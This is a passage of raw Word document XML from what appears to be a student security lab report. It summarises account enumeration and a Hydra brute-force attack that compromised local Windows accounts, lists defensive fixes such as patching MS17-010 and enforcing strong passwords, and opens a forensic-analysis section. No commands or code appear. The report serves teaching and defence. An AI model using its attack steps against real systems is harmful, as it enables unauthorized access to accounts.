          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Account enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery of local accounts (Administrator, Guest, student).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEA253D" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Wordlist creation</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use of weak/common passwords for brute-force testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A37B23" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Hydra brute-force attack</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Successful compromise of Administrator and student accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A8B62A" w14:textId="53509BAA" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="00403B2B">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">This highlights weaknesses in </w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>patch management</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> (unpatched SMB vulnerability) and </w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>password security</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> (use of weak, common passwords).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3699E3B0" w14:textId="77777777" w:rsidR="006B0642" w:rsidRDefault="006B0642" w:rsidP="003D4DCD">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A612785" w14:textId="52057658" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="003D4DCD">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C361759" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Patch Management</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>: Apply MS17-010 and disable SMBv1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322A78BD" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Password Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>: Enforce strong passwords (≥12 chars, mix of upper/lowercase, numbers, symbols).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2266C879" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Account Controls</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>: Disable or rename default accounts (Administrator, Guest).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C258D51" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Authentication Security</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>: Configure account lockouts after failed attempts and enable MFA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AB4195" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>: Enable centralized logging and SIEM alerts for brute-force attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC2E0FA" w14:textId="302000E1" w:rsidR="005C4611" w:rsidRPr="007161AD" w:rsidRDefault="003D4DCD" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Network Hardening</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>: Restrict SMB access to required hosts only and segment networks to reduce lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A895FBB" w14:textId="77777777" w:rsidR="005C4611" w:rsidRDefault="005C4611" w:rsidP="28E2C82A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E0685C" w14:textId="77777777" w:rsidR="005C4611" w:rsidRDefault="005C4611" w:rsidP="28E2C82A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08FE9CE6" w14:textId="77777777" w:rsidR="005C4611" w:rsidRDefault="005C4611" w:rsidP="28E2C82A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="696A96C8" w14:textId="77777777" w:rsidR="005C4611" w:rsidRDefault="005C4611" w:rsidP="28E2C82A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D7AD0C" w14:textId="77777777" w:rsidR="005C4611" w:rsidRDefault="005C4611" w:rsidP="28E2C82A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="636EF3BE" w14:textId="77777777" w:rsidR="007161AD" w:rsidRDefault="007161AD" w:rsidP="007161AD"/>
    <w:p w14:paraId="5CDAD298" w14:textId="77777777" w:rsidR="007161AD" w:rsidRDefault="007161AD" w:rsidP="28E2C82A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79A04482" w14:textId="77777777" w:rsidR="007161AD" w:rsidRPr="007161AD" w:rsidRDefault="007161AD" w:rsidP="007161AD"/>
    <w:p w14:paraId="2831298C" w14:textId="1EC3E953" w:rsidR="00444C92" w:rsidRDefault="3A82E4DF" w:rsidP="28E2C82A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="47DF796B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>FORENSIC EVIDENCE COLLECTION AND ANALYSIS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="7B11594B" w14:textId="27158391" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="28E2C82A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06150A24" w14:textId="0CA69189" w:rsidR="00444C92" w:rsidRDefault="01305C95" w:rsidP="28E2C82A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="28E2C82A">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B81BD84" w14:textId="77777777" w:rsidR="00F11077" w:rsidRPr="00E918D2" w:rsidRDefault="00F11077" w:rsidP="28E2C82A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61C2DC49" w14:textId="77777777" w:rsidR="00566395" w:rsidRPr="00566395" w:rsidRDefault="00566395" w:rsidP="00566395">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00566395">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>The objective of this forensic investigation was to verify the integrity of a provided forensic disk image and to identify any hidden artifacts that might indicate tampering or malicious activity. The scope included:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B89C3A0" w14:textId="77777777" w:rsidR="00566395" w:rsidRPr="00566395" w:rsidRDefault="00566395" w:rsidP="00566395">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F228234" w14:textId="77777777" w:rsidR="00566395" w:rsidRPr="00566395" w:rsidRDefault="00566395" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00566395">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Generating and verifying an MD5 hash to confirm the image integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E9DDC2" w14:textId="77777777" w:rsidR="00566395" w:rsidRPr="00566395" w:rsidRDefault="00566395" w:rsidP="00566395">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BED1F4A" w14:textId="77777777" w:rsidR="00566395" w:rsidRPr="00566395" w:rsidRDefault="00566395" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00566395">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Importing the image into Autopsy for analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D61C1F" w14:textId="77777777" w:rsidR="00566395" w:rsidRPr="00566395" w:rsidRDefault="00566395" w:rsidP="00566395">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B019A9F" w14:textId="77777777" w:rsidR="00566395" w:rsidRPr="00566395" w:rsidRDefault="00566395" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00566395">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Searching the image for hidden or deleted files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57957291" w14:textId="77777777" w:rsidR="00566395" w:rsidRPr="00566395" w:rsidRDefault="00566395" w:rsidP="00566395">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B591658" w14:textId="77777777" w:rsidR="00566395" w:rsidRPr="00566395" w:rsidRDefault="00566395" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00566395">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Recovering and exporting evidence files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BAF680" w14:textId="77777777" w:rsidR="00566395" w:rsidRPr="00566395" w:rsidRDefault="00566395" w:rsidP="00566395">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="768F5FBE" w14:textId="77777777" w:rsidR="00566395" w:rsidRPr="00566395" w:rsidRDefault="00566395" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00566395">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Explaining the forensic significance of recovered artifacts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7558F4A8" w14:textId="77777777" w:rsidR="00566395" w:rsidRPr="00E918D2" w:rsidRDefault="00566395" w:rsidP="00566395">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06EAC598" w14:textId="70AEBBF4" w:rsidR="00444C92" w:rsidRPr="00E918D2" w:rsidRDefault="00566395" w:rsidP="00566395">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E918D2">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>This process mirrors real-world digital forensics practices, where proving data integrity and using repeatable methods are crucial to maintaining chain of custody and legal admissibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26371607" w14:textId="77777777" w:rsidR="004424CE" w:rsidRDefault="004424CE" w:rsidP="00566395">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1510A266" w14:textId="463DE250" w:rsidR="00444C92" w:rsidRDefault="4F79549C" w:rsidP="28E2C82A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="47DF796B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Obtain and </w:t>
      </w:r>
      <w:r w:rsidR="79B8E3DA" w:rsidRPr="47DF796B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify </w:t>
